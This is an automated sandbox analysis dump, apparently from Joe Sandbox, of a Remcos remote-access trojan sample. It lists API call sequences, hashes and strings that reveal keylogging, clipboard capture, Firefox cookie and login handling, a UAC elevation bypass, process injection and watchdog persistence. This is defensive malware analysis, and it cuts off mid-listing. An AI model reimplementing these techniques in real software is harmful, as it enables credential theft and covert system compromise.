                                                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                  • API String ID: 3018269243-13974260
                                                                                  • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                  • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                  • API String ID: 1164774033-3681987949
                                                                                  • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                  • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                  APIs
                                                                                  • OpenClipboard.USER32 ref: 004168FD
                                                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                  • String ID: !D@
                                                                                  • API String ID: 3520204547-604454484
                                                                                  • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                  • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                  • API String ID: 3527384056-432212279
                                                                                  • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                  • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 297527592-0
                                                                                  • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                  • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                  • API String ID: 3756808967-1743721670
                                                                                  • Opcode ID: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                  • Opcode Fuzzy Hash: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                  • API String ID: 0-1861860590
                                                                                  • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                  • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0040755C
                                                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Object_wcslen
                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                  • API String ID: 240030777-3166923314
                                                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                  APIs
                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                  • String ID:
                                                                                  • API String ID: 3587775597-0
                                                                                  • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                  • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                  • String ID: JD$JD$JD
                                                                                  • API String ID: 745075371-3517165026
                                                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                  • API String ID: 1164774033-405221262
                                                                                  • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                  • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                  • String ID:
                                                                                  • API String ID: 2341273852-0
                                                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                                                  • API String ID: 341183262-3812160132
                                                                                  • Opcode ID: 4892e5eb24c0d2a7e6d7771e6aedda4c7c6bb3004fc9eab6671d25a07da39987
                                                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                  • Opcode Fuzzy Hash: 4892e5eb24c0d2a7e6d7771e6aedda4c7c6bb3004fc9eab6671d25a07da39987
                                                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                  • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                                  • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 1888522110-0
                                                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                  APIs
                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                  • API String ID: 2127411465-314212984
                                                                                  • Opcode ID: ce9ca45bb69c927909d80ea55eabee89b224d8876fc5426dcc0e8d1fe242ab6d
                                                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                  • Opcode Fuzzy Hash: ce9ca45bb69c927909d80ea55eabee89b224d8876fc5426dcc0e8d1fe242ab6d
                                                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00449292
                                                                                  • _free.LIBCMT ref: 004492B6
                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                  • _free.LIBCMT ref: 00449609
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                  • String ID:
                                                                                  • API String ID: 314583886-0
                                                                                  • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                  • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                  APIs
                                                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
